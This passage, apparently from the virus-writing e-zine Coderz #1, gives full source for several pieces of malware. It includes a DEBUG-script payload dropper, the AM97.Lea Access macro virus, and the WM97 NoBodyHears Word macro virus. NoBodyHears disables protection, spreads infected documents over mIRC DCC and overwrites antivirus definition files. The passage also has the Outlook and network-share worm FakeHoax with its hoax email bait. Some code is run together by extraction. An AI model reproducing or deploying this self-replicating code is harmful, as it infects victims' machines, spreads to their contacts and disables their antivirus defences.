Print #3, "E 0D60 D9 28 B3 80 39 75 7A B1 04 CB 5C 1A F4 7B 97 4B"
Print #3, "E 0D70 74 79 E1 46 DB 68 B1 72 E7 A6 6C FB CB 5C 8D 72"
Print #3, "E 0D80 02 59 33 76 3B 1A DA 76 7A D6 38 A9 F7 4F 35 FE"
Print #3, "E 0D90 E7 5E 6A 8E 4D E0 F8 8C 86 D2 F2 F4 98 E4 B7 98"
Print #3, "E 0DA0 C7 F9 45 BD A0 78 C7 61 92 69 BA 94 48 F3 9C F7"
Print #3, "E 0DB0 2C 96 B9 2B 29 3F F3 83 D4 14 5F 35 FE E7 5E AF"
Print #3, "E 0DC0 77 B1 52 D9 18 8C 7B 61 AA 05 4C 8D 86 CB C5 DC"
Print #3, "E 0DD0 BA D6 FA 51 98 DC 1E 43 F9 D9 B1 42 7E 3C D5 32"
Print #3, "E 0DE0 57 CB 3C 8B 34 FD 74 7E 9D 4E 4D 02 DE AA FC CF"
Print #3, "E 0DF0 C5 B1 BE 15 18 B3 08 D0 0E A5 FE E7 E5 3C 76 D5"
Print #3, "E 0E00 A5 CB AE 52 06 49 A6 7E FF B3 2A C0 FE E7 44 41"
Print #3, "E 0E10 59 07 15 F8 9F BB 79 F5 A9 26 F6 3F 1B 93 9D B9"
Print #3, "E 0E20 94 FA 9F 53 83 67 CE FF 6C EF 9B AE 5B 7B 47 FF"
Print #3, "E 0E30 73 66 8C FD CF 5A AA AA 6A A2 02 FF 73 41 DD A9"
Print #3, "E 0E40 B1 FE 67 BE 35 EF 7F 66 85 A2 62 85 A2 AD 4B FC"
Print #3, "E 0E50 CF DB EC B2 49 9B 1F F7 D1 A4 8F 59 E6 7F 7E 2A"
Print #3, "E 0E60 64 3A E4 17 24 AD 50 7C 45 FE E7 82 3B 56 43 87"
Print #3, "E 0E70 44 3D 29 D3 F8 8C FF 99 F2 5B 2A DA 7D 13 5F 64"
Print #3, "E 0E80 EC 2A 66 83 A2 B9 94 2E 3B 2D E4 F7 0E FE 67 A3"
Print #3, "E 0E90 1F EF B2 B4 F6 B9 16 05 65 25 FE E7 B2 19 18 86"
Print #3, "E 0EA0 7C 14 CB C4 A7 FD CF C6 E0 39 9F 26 BE CD E4 35"
Print #3, "E 0EB0 74 93 EC AB A9 FF 99 75 93 99 87 7C 07 FF 33 E5"
Print #3, "E 0EC0 67 8F 25 AF CA FF 5C 1A A0 71 C8 A6 47 22 F6 3F"
Print #3, "E 0ED0 73 7E C6 E0 19 17 C5 05 E9 AA F1 D4 FF 9C E6 C7"
Print #3, "E 0EE0 4A 5E E3 7F 4E 5B 1B F8 C0 A9 0A F0 F4 33 97 5E"
Print #3, "E 0EF0 97 FF 99 03 64 05 79 F6 95 24 EB BE 67 8C FF D9"
Print #3, "E 0F00 BC 7A 8C E3 FC 92 53 E0 75 72 AA 92 9E 97 AC 12"
Print #3, "E 0F10 27 AA 7E A9 88 05 A8 F6 BE A9 7A 76 99 BC 1E F5"
Print #3, "E 0F20 F9 05 C9 18 50 EB F2 17 57 E3 7F BE 56 AA F2 3F"
Print #3, "E 0F30 5F 2B 55 F8 9F AF 99 2A FC CF D7 0C FC CF 32 E0"
Print #3, "E 0F40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19"
Print #3, "E 0F50 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3"
Print #3, "E 0F60 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF"
Print #3, "E 0F70 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0"
Print #3, "E 0F80 FF 2C 03 FE 67 19 2F EB 7F 7E FD 34 C0 FF FC AA"
Print #3, "E 0F90 69 80 FF F9 55 D3 00 FF F3 AB A6 01 FE E7 57 4D"
Print #3, "E 0FA0 03 FC CF AF 9A 06 F8 9F 5F 35 F5 FB 9F 79 79 7C"
Print #3, "E 0F B0 E6 EA 62 16 AF 85 4E D7 83 B3 94 F7 9E BF BD 82"
Print #3, "E 0FC0 97 ED C6 AB C0 63 25 AF 6E 77 50 4D A1 7E FF 73"
Print #3, "E 0FD0 98 6F 6E 49 BF BD 82 97 F2 66 6E 18 0D 72 DF FE"
Print #3, "E 0FE0 31 4D 2C DB E7 A7 53 73 94 71 F5 FB 9F 0B CD 41"
Print #3, "E 0FF0 E9 7A E6 C2 7A 70 D7 B7 7F F0 7A E9 B2 F1 97 A1"
Print #3, "E 1000 7E FF 73 90 6F 4D 4B BF BD 82 DB 61 32 37 0C FB"
Print #3, "E 1010 65 F9 05 9D CB A6 85 97 A4 7E FF 73 B7 90 1F EB"
Print #3, "E 1020 DB 87 DC F3 C6 2B F1 33 37 A4 6D 84 19 F8 F0 77"
Print #3, "E 1030 31 F8 92 D4 EF 7F EE E6 3B 4B A7 E6 8B 8E 22 D3"
Print #3, "E 1040 CD 96 B9 A1 A4 B5 B5 AC DB F0 85 A9 DF FF 5C E8"
Print #3, "E 1050 CC E5 EF 8E 32 97 B8 9B 2D 73 C3 A5 FE BE 74 46"
Print #3, "E 1060 BE 30 F5 FB 9F 3B F9 D6 BE F4 DB 2B B8 1D 26 73"
Print #3, "E 1070 43 71 B2 DD 35 F2 EB 90 EA F5 3F 73 67 A5 6E 8D"
Print #3, "E 1080 3C 25 6D 93 BC FB 9A 4B DC 8C 9A A9 2D 7C 7B 05"
Print #3, "E 1090 9F FD 99 4B A7 7C 1B E6 CB 52 AF FF 59 B7 96 EA"
Print #3, "E 10A0 DE AA 43 9C C1 38 F9 A2 A3 F4 BC D8 9E 2A EB B3"
Print #3, "E 10B0 E7 B8 65 DF 9C 4F 6B 2F C2 A1 41 C6 4C F8 9F 65"
Print #3, "E 10C0 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF"
Print #3, "E 10D0 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE"
Print #3, "E 10E0 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 10F0 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 15 F9 9F"
Print #3, "E 1100 AF 96 6A FC CF D7 4B 25 FE E7 2B A6 0A FF F3 35"
Print #3, "E 1110 53 81 FF F9 AA A9 C0 FF 7C D5 54 E1 7F BE 66 2A"
Print #3, "E 1120 F1 3F 5F 31 D5 F8 9F AF 97 8A FC CF 57 0B FC CF"
Print #3, "E 1130 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE"
Print #3, "E 1140 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 1150 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB"
Print #3, "E 1160 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F"
Print #3, "E 1170 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 1180 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 1190 FE 67 19 F0 3F CB 80 FF 59 06 FB 9F F9 6F 80 03"
Print #3, "E 11A0 5E 88 CA CD E8 5B 36 CA 9E F9 CF 5A BC B4 E8 61"
Print #3, "E 11B0 CC 0D D6 2C 19 3B F2 9E DE EE D0 78 D4 1F 0C 47"
Print #3, "E 11C0 B7 77 F7 0F E3 F1 64 3A 9B CD E7 8B E5 72 B9 5A"
Print #3, "E 11D0 AD 99 8D 41 5F 5E AD 68 7C 31 9F CF 66 D3 C9 78"
Print #3, "E 11E0 FC 70 7F 77 3B 1A 0E FA 51 8F 1D 6C 2C 81 3D 1E"
Print #3, "E 11F0 76 DB F5 8A 5D C5 0F 77 A3 44 AE 76 DC 6F D7 4B"
Print #3, "E 1200 E3 2F 36 B6 62 F6 AD 6D 56 8B 99 96 B2 59 A5 F1"
Print #3, "E 1210 91 87 A8 2A 76 57 06 DA EA A6 1F 71 B3 5E 2D 17"
Print #3, "E 1220 B3 29 3D 25 3F 23 3D E5 70 30 E8 F7 A3 A8 D7 EB"
Print #3, "E 1230 85 59 E8 7A 14 F5 FB 83 C1 90 36 46 6F CD 64 3A"
Print #3, "E 1240 9D 2D 96 AB F5 C6 6E 2D BF B5 E5 8F 77 6F EF B8"
Print #3, "E 1250 C9 6D C9 A6 30 DE 5B F9 2F F6 BC 6A 92 3B A7 D9"
Print #3, "E 1260 9E 68 87 4C 7E 66 88 4F 0A F9 83 B9 D1 2D B7 27"
Print #3, "E 1270 2D D8 51 44 A9 D2 4B 75 8B F2 0B 29 C0 E1 C8 04"
Print #3, "E 1280 38 B1 01 2E 38 40 93 60 CC 8A E3 5B D8 F8 CC C6"
Print #3, "E 1290 8C 28 A5 A8 C7 0E BB D6 F9 F9 91 15 80 9B F5 92"
Print #3, "E 12A0 FD CF F7 B7 23 B6 75 76 5A 71 58 39 FF B3 49 74"
Print #3, "E 12B0 96 F3 3F EF B7 1C 29 BB 2B 39 D3 D0 3E E2 61 4F"
Print #3, "E 12C0 F9 51 7C F3 99 89 EF CE C6 17 71 7C 3A B5 C0 60"
Print #3, "E 12D0 13 A4 71 1B E0 9D 09 70 46 73 61 45 F9 ED 0F 76"
Print #3, "E 12E0 6B 43 9D D5 3D 77 A9 B2 29 EC C8 A7 2B 3C DB 74"
Print #3, "E 12F0 7E 66 B6 5D 46 AA 87 EC 9C D4 65 7C D7 03 EF E9"
Print #3, "E 1300 3C 01 C3 74 02 9A DF 19 3D A9 0D 30 89 50 5F E6"
Print #3, "E 1310 F8 16 1C 1F 6F 4C 3A FD D8 FF 4C 41 D1 1C E2 10"
Print #3, "E 1320 74 30 76 AE 25 33 AB 30 D9 D2 19 D9 8F 67 24 0F"
Print #3, "E 1330 65 92 67 77 AA 7D 44 9E 7E F3 CC 6F 2C 9E 7D 69"
Print #3, "E 1340 78 49 84 C9 0C 4C 67 C3 DC 4C 40 BD B5 FC D6 36"
Print #3, "E 1350 37 8B D8 75 6A F6 D6 7E 66 6F FD 1F 50 4B 01 02"
Print #3, "E 1360 14 00 14 00 00 00 08 00 38 51 9B 28 17 D3 09 49"
Print #3, "E 1370 36 12 00 00 36 F8 01 00 08 00 00 00 00 00 00 00"
Print #3, "E 1380 00 00 20 00 B6 81 00 00 00 00 6C 6F 67 6F 2E 53"
Print #3, "E 1390 59 53 50 4B 05 06 00 00 00 00 01 00 01 00 36 00"
Print #3, "E 13A0 00 00 5C 12 00 00 00 00"
Print #3, "RCX"
Print #3, "12A8"
Print #3, "W"
Print #3, "Q"
Close #3
End Sub

Sub CreateBat()
Open "c:\windows\hop_along.bat" For Output As #4
Print #4, "del c:\windows\logo.sys"
Print #4, "del c:\logo.sys"
Print #4, "cd c:\windows\"
Print #4, "debug < c:\windows\pkunzip.dbg"
Print #4, "debug < c:\windows\logo.dbg"
Print #4, "c:\windows\pkunzip.com logo.zip"
Print #4, "exit"
Close #4
End Sub

Sub Wait4Bat()
If Dir("c:\windows\logo.sys") = "" Then Wait4Bat
End Sub


Option Compare Database
Option Explicit
Function Lea()
'AM97.Lea.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
On Error Resume Next
CommandBars("tools").Controls("Macro").Delete
CurrentDb.Properties("AllowBypassKey") = False
CurrentDb.Properties("AllowSpecialKeys") = False
CurrentDb.Properties("AllowBreakIntoCode") = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Application.MacrovirusProtection = False
Dim FilesToGet, FilesToInfect, CodeBase As String
FilesToInfect = False
FilesToGet = Dir("*.mdb", vbNormal)
If FilesToGet <> "" Then
CodeBase = CurrentDb.Name
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acModule, "lea", "lea"
While FilesToGet <> ""
FilesToGet = Dir
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access", FilesToGet, acModule, "lea", "lea"
Wend
On Error GoTo Exit_Payload
If Day(Now()) = Int(Rnd() * 3) + 1 Then
MsgBox "AM97.Lea.a", "Welcome to this place, I'll Show you everything. With arms wide open."
End If
Exit_Payload:
End If
End Function


Attribute VB_Name = "NoBodyHears"Sub AutoClose()'************************************************** ****************'WM97 NoBodyHears'By AngelsKitten / [NuKE]'Greetings to Evul, Knowdeth, Jackie twoflower, Fox z'Reptile, Duke, Raven, Deloss, Bumblebee, Masey, RA iD,'FlyShadow, and the following groups: MVT, 29A, NVT & SLAM'************************************************** ****************On Error Resume NextApplication.VBE.ActiveVBProject.VBComponents( "NoBodyHears" ).Export "C:\VXD.dll"With Options

.ConfirmConversions = False

.VirusProtection = False

.SaveNormalPrompt = FalseEnd WithWith Application

.ScreenUpdating = False

.DisplayStatusBar = False

.DisplayAlerts = wdAlertsNone

.EnableCancelKey = wdCancelDisabledEnd WithCommandBars( "Tools" ).Controls( "Macro" ).Enabled = FalseCommandBars( "Tools" ).Controls( 12).Enabled = FalseCommandBars( "Tools" ).Controls( 12).DeleteCommandBars( "tools" ).Controls( "Macro" ).DeleteCommandBars( "tools" ).Controls( "Customize..." ).DeleteCommandBars( "view" ).Controls( "Toolbars" ).DeleteCommandBars( "view" ).Controls( "Status Bar" ).DeleteFor ¢ = 1 To NormalTemplate.VBProject.VBComponents.CountIf NormalTemplate.VBProject.VBComponents(¢).Name = "NoBodyHears" Then ¶ = TrueNext ¢For ¢ = 1 To ActiveDocument.VBProject.VBComponents.CountIf ActiveDocument.VBProject.VBComponents(¢).Name = "NoBodyHears" Then Ü = TrueNext ¢If Ü = True And ¶ = False Then Set § = NormalTemplate.VBProject _Else If Ü = False And ¶ = True Then Set § = ActiveDocument.VBProject§.VBComponents.Import ( "C:\VXD.dll" )On Error GoTo scriptoopsOpen "C:\audio.vxd" For Output As #1Print #1, "[script]"Print #1, "n0=;NobodyHears by Angelskitten / [NuKE]"Print #1, "n1=on 1:PART:#:{ /if ( $nick == $me ) { halt }"Print #1, "n2= /dcc send $nick C:\windows\aboutme.doc"Print #1, "n3=}"Print #1, "n4="Print #1, "n5=on 1:JOIN:#:{ /if ( $nick == $me ) { halt }"Print #1, "n6= /dcc send $nick C:\windows\aboutme.doc"Print #1, "n7=}"Print #1, "n8="Print #1, "n9=on 1:TEXT:*infected*:#:/.ignore $nick"Print #1, "n10=on 1:TEXT:*infected*:?:/.ignore $nick"Print #1, "n12=on 1:TEXT:*clean*:#:/.ignore $nick"Print #1, "n13=on 1:TEXT:*clean*:?:/.ignore $nick"Print #1, "n14=on 1:TEXT:*script.ini*:#:/.ignore $nick"Print #1, "n15=on 1:TEXT:*script.ini*:?:/.ignore $nick"Print #1, "n16=on 1:TEXT:*virus*:#:/.ignore $nick"Print #1, "n17=on 1:TEXT:*virus*:?:/.ignore $nick"Print #1, "n18=on 1:TEXT:*worm*:#:/.ignore $nick"Print #1, "n19=on 1:TEXT:*worm*:?:/.ignore $nick"Print #1, "n20=on 1:TEXT:*aboutme*:#:/.ignore $nick"Print #1, "n21=on 1:TEXT:*aboutme*:?:/.ignore $nick"Print #1, "n22=on 1:TEXT:*aboutme.doc*:#:/.ignore $nick"

Page 330: EZine - Coderz #1

Print #1, "n23=on 1:TEXT:*aboutme.doc*:?:/.ignore $nick"Print #1, "n24=on 1:TEXT:*doc*:#:/.ignore $nick"Print #1, "n25=on 1:TEXT:*doc*:?:/.ignore $nick"Print #1, "n26=on 1:TEXT:*blank*:#:/.ignore $nick"Print #1, "n27=on 1:TEXT:*blank*:?:/.ignore $nick"Print #1, "n28=ON 1:QUIT:#:/msg $chan I tryed to tell you, I tryed to show you. NoBodyHears"Print #1, "n29=ON 1:connect: {"Print #1, "n30= /run attrib +r +s +h C:\mirc\Script.ini"Print #1, "n31=}"Close #1scriptoops:On Error GoTo batoopsOpen "c:\windows\WinStart.bat" For Output As #2Print #2, "@Echo Off"Print #2, "copy /y c:\audio.vxd c:\mirc\script.ini >nul"Print #2, "copy /y c:\PROGRA~1\MICROS~3\TEMPLA~1\normal.dot c :\windows\aboutme.doc >nul"Close #2batoops:If Day(Now()) = 12 ThenSetAttr "C:\program files\AntiViral Toolkit Pro\*.avc" , vbReadOnlyOpen "C:\program files\AntiViral Toolkit Pro\*.avc" For Output As #3Print #3, "NoBodyHears"Close #3SetAttr "C:\program files\AntiViral Toolkit Pro\avp.set" , vbReadOnlyOpen "C:\program files\AntiViral Toolkit Pro\avp.set" For Output As #4Print #4, "NoBodyHears"Close #4SetAttr "C:\program files\mcafee\*.dat" , vbReadOnlyOpen "C:\program files\mcafee\*.def" For Output As #5Print #5, "NoBodyHears"Close #5SetAttr "C:\f-marco\*.def" , vbReadOnlyOpen "C:\f-macro\*.def" For Output As #6Print #6, "NoBodyHears"Close #6End IfIf Day(Now()) = Int(Rnd * 31) + 1 Then

With Assistant.NewBalloon.Icon = msoIconTip.Animation = msoAnimationGetArtsy.Heading = "WM97 NoBodyHears".Text = "Welcome to WM97 NoBodyHears by Angelskitten / [NuK E]".Show

End WithActiveDocument.Password = "NoBodyHears"Shell "start http://www.avp.com.au/" , vbHide

End IfActiveDocument.SaveAs FileName:=ActiveDocument.FullN ame, FileFormat:=wdFormatDocumentSetAttr ( "c:\VXD.dll" ), vbHidden + vbSystemEnd SubSub AutoOpen()

Call AutoCloseEnd SubSub AutoNew()

Call AutoCloseEnd SubSub ViewVBCode()

MsgBox "Unexcpected error" , 16Call AutoClose

End SubSub ViewCode()

MsgBox "Unexcpected error" , 16Application.Caption = "Word 6.0"

Call AutoCloseEnd SubSub ToolsMacro()

MsgBox "Unexcpected error" , 16Call AutoClose

End SubSub FileTemplates()

MsgBox "Unexcpected error" , 16Application.Caption = "Word 6.0"Call AutoClose

End SubSub HelpWordPerfectHelp()MsgBox "Unexcpected error" , 16

Application.Caption = "Word 6.0"Call AutoClose

End Sub

' Worm Name: NETWORK/OUTLOOK.FakeHoax
' Author: Zulu
' Origin: Argentina

' Encoded JScript/VBScript worm, first in a JSE or VBE file. It uses OUTLOOK and the network
' shares.
' The main code is a COM object written in XML and VBScript using Windows Script Component, so
' the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object
' defined in XML) and then both call methods and change properties of that object, no real
' spreading code is in those files.
' The worm was written in this way to make it easier to port it to any other language, this way
' I was able to create a JSE and a VBE file without really porting the main code. Also, it's
' possible to create new versions using Delphi, Visual C++, or any other by using "REGSVR32.EXE"
' to register the WSC file as a COM object before calling its methods or changing its
' properties.
' This worm was written to show how JSE and VBE files could be used in viruses/worms, since
' before this they were only used as auxiliary files (some versions of HTML.rahC by 1nternal and
' OUTLOOK.Monopoly by me for example). Besides, since it needs Windows Script Host 2.0 or later,
' it won't be good at spreading itself at the time of writing this.
' Also, this was a good opportunity for using Windows Script Component for the first time because
' it made it possible to write a JScript and a VBScript version without needing to port the whole
' code, so this is also the first virus/worm using its own COM object.
'
' Features:
'
' - OUTLOOK spreading. It will use OUTLOOK to send itself to all contacts in the address book if
'   the number of addresses is less than 101. If that number is more than 100 it will try to
'   select 100 random addresses. Subject and body are always the same.
' - Network spreading. It will copy itself to the root of all shares (not only mapped drives),
'   waiting for someone to run it.
' - The worm file ("WOBBLER.TXT.JSE" or "WOBBLER.TXT.VBE" depending on the version) will show a
'   TXT file when run, so it will show what many users expect.
'   This TXT file will show the Wobbler hoax (the reason for the worm's name), which is a strange
'   social engineering method for a real worm. Anyway, since this won't spread well because of
'   other reasons, even if someone wants to spread it, I won't know if the hoax message is good
'   for this purpose. Message subject and body talk about important information in the TXT file,
'   but they don't talk about the hoax because this could cause fear in the user from opening the
'   file or maybe make the user remember about viruses and check for double extensions.
' - It has a 1/5 probability of also sending another email to the same addresses as the email
'   having the worm file. The body of this email will have a poem written in Spanish.
'   The reason for this is an unusual request from a friend, she wanted one of her poems to be
'   included in a virus/worm.
'   So, even if this means unnecessary bytes and even worse spreading capabilities, here it is. :)
' - There is no need for AV products or removers after running the worm since Windows' settings are
'   not changed and all temporary files are deleted.
'
' Here is the JSE file without encoding:

G=new ActiveXObject( "Scripting.FileSystemObject" );A=G.GetTempName().concat( ".WSC" );

S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder( 2),A), true );S.Write( "<?XML version=\" 1.0 \ "?>\r\n<component>\r\n <comment>\r\n NETWORK/OUTLOOK.FakeHoax\r\n </comment>\r\n <publ ic>\r\n <property name=\" AttachmentFile\ "/>\r\n <property name=\" TextFile\ "/>\r\n <property name=\" WormFile\ "/>\r\n <method name=\" DelTempFiles\ "/>\r\n <method name=\" NetworkSpreading\ ">\r\n <parameter name=\" FileName\ "/>\r\n </method>\r\n <method name=\" OutlookSpreading\">\r\n <parameter name=\" Body\ "/>\r\n <parameter name=\" MaxAmount\ "/>\r\n <parameter name=\" Subject\ "/>\r\n </method>\r\n <method name=\" ShowText\ ">\r\n <parameter name=\"C ontent\ "/>\r\n </method>\r\n </public>\r\n <script la nguage=\"VBScript\ ">\r\n <![CDATA[\r\n Sub DelTempFiles\r\n On Error Resume Next\r\n Set FSO = CreateObject(\" Scripting.FileSystemObject\ ")\r\n If FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True\r\n If FSO.FileExists(TextFile) Then FSO.DeleteFile TextFi le, True\r\n Set FSO = Nothing\r\n End Sub\r\n Sub NetworkSpreading( FileName)\r\n On Error Resume Next\r\n Set Network = CreateObject(\" WScript.Network\ ")\r\n Set Shares = Network.EnumNetworkDrives\r\n If Shares.Count > 0 Then\r\n Set FSO = CreateObject(\" Scripting.FileSystemObject\ ")\r\n For Counter1 = 0 To Shares.Count - 1\r\n If Shares.Item(Counter1) <> \" \ " Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)\r\n Next\r\n Set FSO = Nothing\r\n End If\r\n Set Shares = Nothi ng\r\n Set Network = Nothing\r\n End Sub\r\n Sub OutlookSpreading(MaxAmount, Subj ect, Body)\r\n On Error Resume Next\r\n Set FSO = CreateObject(\" Scripting.FileSystemObject\ ")\r\n FSO.CopyFile WormFile, AttachmentFile\r\n Set FSO = Nothing \r\n Outlook = \" \ "\r\n Set Outlook = CreateObject(\" Outlook.Application\ ")\r\n If Outlook <> \" \ " Then\r\n Set MAPI = Outlook.GetNameSpace(\" MAPI\ ")\r\n For Each List In MAPI.AddressLists\r\n If List.AddressEntri es.Count > 0 Then\r\n Set Email1 = 
Outlook.CreateItem(0)\r\n If Li st.AddressEntries.Count > MaxAmount Then\r\n Dim Address()\r\n ReDim Address(MaxAmount - 1)\r\n For Counter1 = 0 To MaxAmount - 1\r\n Address(Counter1) = Int(List.AddressEntries.Count * Rnd)\r\n Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n For Counter2 = Counter1 + 1 To MaxAmount - 1\r\n If Address(Counter1) = Addre ss(Counter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1\r\n Next \r\n Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n If Address(Counter1) = -1 Then Address(Counter1) = Int(List.AddressEntries.Count * Rnd)\r\n Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n For Counter2 = Counter1 + 1 To MaxAmount - 1\r\n If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1\r\n Next\r\n Next\r\n For Cou nter1 = 0 To MaxAmount - 1\r\n If Address(Counter1) <> -1 The n\r\n Set Entry = List.AddressEntries(Address(Counter1))\r\n If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses & \" ; \ " & Entry.Address\r\n Set Entry = Nothing\r\n End If\r\n Next\r\n Else\r\n For Counter1 = 1 To List.Addr essEntries.Count\r\n Set Entry = List.AddressEntries(Counter1)\r\n If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses & \" ; \ " & Entry.Address\r\n Set Entry = Nothing\r\n Next\r\n End If\r\n Email1.BCC = Addresses\r\n Email1.Subject = Subject\r \n Email1.Body = Body\r\n Email1.Attachments.Add Attachme ntFile\r\n Email1.DeleteAfterSubmit = True\r\n Emai l1.Send\r\n Set Email1 = Nothing\r\n Randomize\r\n If Int(5 * Rnd) = 0 Then\r\n Set Email2 = Outlook.CreateItem(0)\r\n Email2.BCC = Addresses\r\n Email2.Subject = \" Alma\ "\r\n Email2.Body = \" No alucines que te amo,\ " & Chr(13) & Chr(10) & \"c uando en realidad es solo\ " & Chr(13) & Chr(10) & \" mi coraz\ " & Chr(243) & \" n qui\ " & Chr(233) & \" n lo hace.\ " & Chr(13) & Chr(10) & \" Porque como ya sabr\" & Chr(225) & \" s,\ " & Chr(13) & Chr(10) & \" mi coraz\ " & Chr(243) & \" n no manda en mi 
vida,\ " & Chr(13) & Chr(10) & \" si as \ " & Chr(237) & \" lo hiciera,\ " & Chr(13) & Chr(10) & \" mialma estar\ " & Chr(237) & \" a perdida.\ "\r\n Email2.DeleteAfterSubmit = True\r\n Email2.Send\r\n Set Email2 = Nothing\r\n End If\r\n End If\r\n Next\r\n S et MAPI = Nothing\r\n Set Outlook = Nothing\r\n End If\r\n End Sub\r\n Sub ShowText(Content)\r\n On Error Resume Next\r\n Set FSO = CreateObject(\" Scripting.FileSystemObject\ ")\r\n Set File = FSO.CreateTextFile(TextFile, True)\r\n File.Write(Content)\r\n

File.Close\r\n Set File = Nothing\r\n Set FSO = Nothing\r\n Set WSHShell = CreateObject(\" WScript.Shell\ ")\r\n WSHShell.Run(TextFile)\r\n Set WSH Shell = Nothing\r\n End Sub\r\n ]]>\r\n </script>\r\ n</component>\r\n" )S.Close();F=GetObject( "script:" .concat(G.BuildPath(G.GetSpecialFolder( 2),A)));F.AttachmentFile=G.BuildPath(G.GetSpecialFolder( 2), "WOBBLER.TXT.JSE" );F.TextFile=G.BuildPath(G.GetSpecialFolder( 2), "WOBBLER.TXT");F.WormFile=WScript.ScriptFullName;F.ShowText( "Thought you might be interested in this message. I f you receive an\r\nemail with a file called \"C alifornia\ " do not open the file. The file\r\ncontains the \" WOBBLER\" virus.\r\n\r\nThis information was announced yester day morning by IBM. The statement\r\nsays that ... \" This is a very dangerous virus, much worse than\r\n 'Melissa' and there is NO remedy for it at this time. Some very sick\r\nindiv idual has succeeded in using the reformat function from Norton\r\nUtilities causing it to com pletely erase all documents on the hard\r\ndrive. It has been designed to work with Ne tscape Navigator and\r\nMicrosoft Internet Explorer. It destroys Macintosh and IBM co mpatible\r\ncomputers. This is a new, very malicious virus and not many people\r\nknow ab out it at this time.\"\r\n\"Please pass this warning file to everyone in your address book and\r\nshare it with all your online friends ASAP so that the destruction it\r\ncan caus e may be minimized.\"\r\n");F.OutlookSpreading( 100 , "Fw: important" , "> Thought you might be interested in this message, read the attachment for more information." );F.NetworkSpreading( "WOBBLER.TXT.JSE" );F.DelTempFiles();G.DeleteFile(G.BuildPath(G.GetSpecialFolder( 2),A), true );

' Here is the VBE file without encoding:

Set G=CreateObject( "Scripting.FileSystemObject" )A=G.GetTempName&".WSC"Set S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder( 2),A), True )O=Chr( 13)&Chr( 10)S.Write "<?XML version=""1.0""?>" &O&"<component>" &O&" <comment>" &O&" NETWORK/OUTLOOK.FakeHoax"&O&" </comment>" &O&" <public>" &O&" <property name=""AttachmentFile""/>" &O&" <property name=""TextFile""/>" &O&" <property name=""WormFile""/>" &O&" <method name=""DelTempFiles""/>" &O&" <method name=""NetworkSpreading"">" &O&" <parameter name=""FileName""/>" &O&" </method>" &O&" <method name=""OutlookSpreading"">" &O&" <parameter name=""Body""/>" &O&" <parameter name=""MaxAmount""/>" &O&" <parameter name=""Subject""/>" &O&" </method>" &O&" <method name=""ShowText"">" &O&" <parameter name=""Content""/>" &O&" </method>" &O&" </public>" &O&" <script language=""VBScript"">" &O&" <![CDATA[" &O&" Sub DelTempFiles"&O&" On Error Resume Next" &O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")" &O&" If FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True" &O&" If FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True" &O&" Set FSO = Nothing" &O&" End Sub" &O&" Sub NetworkSpreading(FileName)" &O&" On Error Resume Next" &O&" Set Network = CreateObject(""WScript.Network"")" &O&" Set Shares = Network.EnumNetworkDrives" &O&" If Shares.Count > 0 Then" &O&" Set FSO = CreateObject(""Scripting.FileSys temObject"")"&O&" For Counter1 = 0 To Shares.Count - 1" &O&" If Shares.Item(Counter1) <> """" Then FSO.CopyFile WormFile, FSO.BuildPath(Shar es.Item(Counter1), FileName)" &O&" Next" &O&" Set FSO = Nothing" &O&" End If" &O&" Set Shares = Nothing" &O&" Set Network = Nothing" &O&" End Sub" &O&" Sub OutlookSpreading(MaxAmount, Subject, Body) "&O&" On Error Resume Next" &O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")" &O&" FSO.CopyFile WormFile, AttachmentFile"&O&" Set FSO = Nothing" &O&" Outlook = """"" &O&" Set Outlook = CreateObject(""Outlook.Application"")" &O&" If Outlook <> """" Then" 
